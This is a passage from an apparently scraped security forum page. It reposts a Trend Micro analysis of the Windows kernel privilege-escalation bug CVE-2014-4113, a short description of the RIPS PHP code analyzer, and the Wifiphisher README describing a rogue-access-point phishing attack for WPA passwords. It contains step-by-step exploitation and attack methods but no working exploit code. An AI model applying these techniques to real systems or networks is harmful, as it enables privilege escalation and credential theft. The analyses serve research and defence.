70857e02d60c66e27a173f8f292774f1 f9f01ce747679b82723b989d01c4d927 We detect these as TROJ_APOLMY.A and TROJ64_APOLMY.A, with the latter being the version found on 64-bit systems. Everything you need to know about the Win32k.sys vulnerability Win32k.sys is responsible for window management, and any GUI process/thread that will use it. Its related user-mode modules are user32.dll and GDI32.dll. Due to the complex interaction with user-mode applications, there are many problems in Win32k.sys. Let’s take a closer look on the vulnerability being exploited. The essential problem is the function return value is not validated correctly. Programmers tend to overlook this, but doing otherwise is a serious security risk. In Win32k.sys, there is a function called xxxMNFindWindowFromPoint(), which returns the address of win32k!tagWND structure or error code -1, -5. Another function xxxHandleMenuMessages() will call it and use its return value as parameter of xxxSendMessage(). Below is the pseudo code: xxxHandleMenuMessages() { tagWnd* pWnd = xxxMNFindWindowFromPoint(…); … //without checking if the return value is a valid address xxxSendMessage(pwnd,…); } Obviously, if the error code -1 or -5 is used in xxxSendMessage() as an address, it will result in an error, such as a blue screen. In user-mode code, this is currently not exploitable. We will see how the sample exploits this vulnerability in kernel-mode in the next section. Below are the key steps or description on how the exploit occurs: Map a prepared memory section to NULL page, which includes a fake win32k!tagWND structure and a pointer to shell code for EoP in that structure. Trigger the bug and make the return value (pWnd) of xxxMNFindWindowFromPoint() to be -5 (0xfffffffb). Because all to-be-checked fields in the fake structure are accessible and in proper values, xxxSendMessage() will treat -5 as a valid address. It will then call a function pointer in the structure, which is the pointer to the shell code. Replace the token in EPROCESS to elevate to SYSTEM privileges in shell code. Create a child process with SYSTEM privileges of the assigned program The sample uses SetWindowsHookEx () to control xxxMNFindWindowFromPoint() to return -5: Create a window and 2-level popup menu. Hook that window’s wndproc call. Track popup menu on the window and enter hook callback. In the hook callback, it changes wndproc of the menu to another callback. In menu’s callback, it will destroy the menu and return -5 (PUSH 0xfffffffb; POP EAX) Lead to xxxMNFindWindowFromPoint() on the destroyed menu return -5 Furthermore, the shell code of the sample is simple and direct, as can be seen from the snippet below. We can see that it gets EPROCESS of SYSTEM process (PID=4), and copies its privilege token to EPROCESS of current process. Figure 1. Code snippet of the sample From the analysis, we can see that it is easier to exploit these kernel vulnerabilities than to exploit vulnerabilities like Internet Explorer UAF vulnerabilities. Some effective protections in user-mode, like DEP, is easily bypassed in kernel-mode exploits. This is because a program, instead of entered data or script, is used to exploit the bug. Such code is by its nature already executable. With more application sandboxing adopted in the OS, kernel vulnerabilities will be more important for privilege elevation. Though this exploitation method is not new anymore, it will be noticed by attackers, especially now that CVE-2014-4113 is public. During our sample sourcing, we even saw that the source code of an exploit creation tool was exposed. It is expected that more exploits variants will be created by attackers. We believe that threat actors and attackers need kernel vulnerability to carry out EoP attacks and break application sandboxing. Once information about these exploitation methods become more prevalent, we may see more similar kernel zero-day vulnerabilities in the future. Windows 7 and Windows XP are the versions of Windows most at risk of this attack. Enterprises are heavy users of both versions, and may be affected by this threat. We highly recommend that users and system administrators apply the relevant patches and keep their systems up-to-date. Windows 8 and later versions are at less risk, as the currently available exploit code is blocked on these versions. This is because of a new security feature known as Supervisor Mode Execution Prevention (SMEP), which prevents the access (read/write/execute) of user-mode memory pages in kernel-mode. As such, the access to null page and shell code will not lead to code execution, although it will lead to crashes. Trend Micro is continuously monitoring the threat landscape for any developments regarding these vulnerabilities including Sandworm. For more information on them, you may read our other articles: Sandworm to Blacken: The SCADA Connection An Analysis of Windows Zero-day Vulnerability ‘CVE-2014-4114’ aka “Sandworm” MS Zero-Day Used in Attacks Against European Sectors, Industries Sursa: An Analysis of A Windows Kernel-Mode Vulnerability (CVE-2014-4113) | Security Intelligence Blog | Trend Micro
  24. Nytro
    18 October 2014 | 734 views RIPS – Static Source Code Analysis For PHP Vulnerabilities RIPS is a tool written in PHP to find vulnerabilities using static source code analysis for PHP web applications. By tokenizing and parsing all source code files RIPS is able to transform PHP source code into a program model and to detect sensitive sinks (potentially vulnerable functions) that can be tainted by user input (influenced by a malicious user) during the program flow. Besides the structured output of found vulnerabilities RIPS also offers an integrated code audit framework for further manual analysis. Features detect XSS, SQLi, File disclosure, LFI/RFI, RCE vulnerabilities and more 5 verbosity levels for debugging your scan results mark vulnerable lines in source code viewer highlight variables in the code viewer user-defined function code by mouse-over on detected call active jumping between function declaration and calls list of all user-defined functions (defines and calls), program entry points (user input) and scanned files (with includes) connected to the source code viewer graph visualization for files and includes as well as functions and calls create CURL exploits for detected vulnerabilties with few clicks visualization, description, example, PoC, patch and securing function list for every vulnerability 7 different syntax highlighting colour schemata display scan result in form of a top-down flow or bottom-up trace only minimal requirement is a local webserver with PHP and a browser (tested with Firefox) regex search function There are other PHP-centric tools we’ve covered such as: – RATS – Rough Auditing Tool for Security – Skavenger – Source Code Auditing Tool! – SpikeSource Spike PHP Security Audit Tool If you are interested in more tools of this type you can find our complete list here (which covers various languages) – Code Auditing Tools. NOTE: The authors have stated that RIPS 0.5 development is abandoned. A complete rewrite is in the works and used as an academic prototype but it is not publicly available yet. So we’ll be keeping an eye on what happens with that. But for now you can download RIPS here: rips-0.54.zip Or read more here. Sursa: RIPS - Static Source Code Analysis For PHP Vulnerabilities - Darknet - The Darkside
  25. Nytro
    [h=2]About[/h] Wifiphisher is a security tool that mounts fast automated phishing attacks against WPA networks in order to obtain the secret passphrase. It is a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining WPA credentials. Wifiphisher works on Kali Linux and is licensed under the MIT license. From the victim's perspective, the attack makes use in three phases: Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's wifi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed. Victim is being served a realistic router config-looking page. wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for WPA password confirmation due to a router firmware upgrade. Performing MiTM attack [h=2]Usage[/h] [h=2]Screenshots[/h] Targeting an access point A successful attack [h=2]Requirements[/h] Kali Linux. Two network interfaces, one wireless. A wireless card capable of injection. [h=2]Credits[/h] The idea belongs to Dan McInerney who also authored two essential modules of this script, wifijammer and fakeAP. [h=2]License[/h] Wifiphisher is licensed under the MIT license. See LICENSE for more information. Sursa: https://github.com/sophron/wifiphisher
×
×
  • Create New...